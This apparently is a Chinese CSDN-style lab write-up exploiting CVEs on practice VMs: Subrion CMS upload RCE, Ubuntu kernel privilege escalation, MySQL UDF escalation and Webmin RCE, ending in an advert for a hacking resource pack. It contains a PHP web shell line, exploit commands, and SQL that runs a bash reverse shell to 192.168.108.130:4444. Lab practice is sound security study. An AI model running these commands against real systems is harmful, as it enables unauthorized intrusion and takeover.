漏洞复现,就像拆盲盒,永远不知道下一个惊喜(或者惊吓)是什么!今天,就带大家一起“开箱”几个我遇到的CVE漏洞,保证让你看完直呼内行!
数据库加解密?DecryptTools 一键搞定!
代码审计还在愁?铲子 SATST 帮你忙!
一、CVE-2018-29422:文件上传变“炸弹”,RCE漏洞激情复现
目标:venom靶机
首先,给咱们的 venom.box 安排个域名解析,让它有个家:
然后,冲着它就是一顿猛点:
嚯!一个登录界面,还贴心地告诉你系统版本是 Subrion CMS v4.2.1,这不就等于在说“快来搞我”吗?
image-20250312153555716
赶紧查查老底,果然发现一个文件上传RCE漏洞,简直是天赐良机!
image-20250312153755215
撸起袖子就是干!
参考文章:https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE
直接梭哈:sudo python3 49876.py -u http://venom.box/panel/ -l dora -p E7r9t8@Q#h%Hy+M1234
Shell是拿到了,但是想切换成交互模式?没门!
换个姿势!用维吉尼亚解密后的密码,登录管理面板:
成功上位!管理员权限到手!赶紧去设置里溜达一圈:
既然有文件上传RCE漏洞,那必须得找个上传点啊!
Bingo!就是这儿了!
image-20250312155354469
点它!
image-20250312155446078
先传个txt文件试试水,嗯,成功了!
image-20250312155542068
来个狠的,php文件!Duang~ 被过滤了!看来没那么容易。
track <?php system($_GET["a"]); ?>
不过没关系,路径已经暴露:
image-20250312155917497
漏洞利用代码里提示要用pht或phar后缀,安排!
exp文章:https://github.com/intelliants/subrion/issues/801
image-20250312165130284
去这个网站生成反弹shell:https://www.ddosi.org/shell/
新建一个.pht文件,把反弹shell代码塞进去,上传!访问这个路径:
攻击机开启监听,Boom!反弹成功!
image-20250312170506847
二、CVE-2021-3493:Ubuntu低版本内核提权,菜鸟也能变大佬!
目标:venom靶机
老规矩,先搜历史漏洞:
image-20250312170937361
看看这漏洞长啥样:
image-20250312171341391
使用方法也贴心地给你准备好了:
image-20250312171249834
开启web服务,在靶机上下载脚本:
image-20250312171518442
结果...执行失败!权限也给了,还是不行!
image-20250312172158480
不怕!换个exp!
exp文章:https://github.com/briskets/CVE-2021-3493
下载到kali:
image-20250312172439048
继续开启web服务,用 wget 命令下载到靶机,赋予权限,编译,然后执行!
成了!提权成功!进 **/root 目录,flag到手!
image-20250312172519193
三、CVE-2016-6662:UDF提权,让你的MySQL变成“私人订制”!
先看看版本是64位还是32位,这决定你使用的udf文件带64还是不带64
目标:sundown靶机
是64位!再看看 secure_file_priv 是否为空,这决定了MySQL会不会对导入导出做限制:
show global variables like 'secure%';
没有回显?淡定!
具体信息来了:
- secure_file_priv 的值为 NULL ,表示不允许导入导出,GG
- secure_file_priv 的值为 /tmp/ ,表示只能在 /tmp/ 玩,没意思
- secure_file_priv 的值为空,表示随便你搞,冲!
再看看MySQL版本,>=5.1 的话,上传 udf 要放在 mysqllibplugin 目录里,用 show variables like "%plugin%" 看看(没有就自己建一个)。
路径也给你找好了:
show variables like '%plugin%'; 路径:/usr/lib/x86_64-linux-gnu/mariadb19/plugin/
一切就绪,开始提权!去kali的 /usr/share/metasploit-framework/data/exploits/mysql 目录,把 64位的udf 文件拷到本地(windows用.dll,linux用.so,别搞错了!)。
开启web服务,传文件!
上传成功!
回到靶机,进 **/tmp 目录:
回到数据库,看看mysql数据库下的数据表信息:
开始骚操作:
create table shell(line blob); # 需要为blob,因为是二进制对象存储容器,存储下面load_file的返回值 insert into shell values(load_file('/tmp/lib_mysqludf_sys_64.so')); # 插入并存储load_file的返回值
写入文件,创建函数,反弹shell!(bash一定要加-c参数,不然会报错!)
select * from shell into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so'; # 将/tmp/udf文件写入到plugin里 create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; # 创建函数于udf文件中加载 select sys_exec('bash -c "bash -i >& /dev/tcp/192.168.108.130/4444 0>&1"'); # 调用函数执行反弹shell
攻击机开启监听端口,执行!成功反弹shell!
四、CVE-2019-15107:Webmin远程命令执行,一键Get Shell!
目标:Source靶机
访问 10000 端口,是个登录网站,源码和指纹信息没啥利用价值:
想起之前找到的版本号,查查历史漏洞:
下载下来看看,要结合 msf 才能用:
网上冲浪一波,发现真有漏洞!参考文章:
https://github.com/squid22/Webmin_CVE-2019-15107 https://github.com/jas502n/CVE-2019-15107?tab=readme-ov-file
下载exp到kali:
赋予权限:
开启监听端口,执行脚本:
./webmin_exploit.py 192.168.108.154 10000 192.168.108.130 4444
Root权限到手!
总结: 漏洞复现,就像一场刺激的冒险,充满了未知和挑战。希望今天的“开箱”体验,能让你对网络安全有更深入的了解,也希望你能在未来的安全道路上,越走越远,成为真正的安全大佬!
黑客/网络安全学习包
资料目录
-
成长路线图&学习规划
-
配套视频教程
-
SRC&黑客文籍
-
护网行动资料
-
黑客必读书单
-
面试题合集
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
*************************************CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************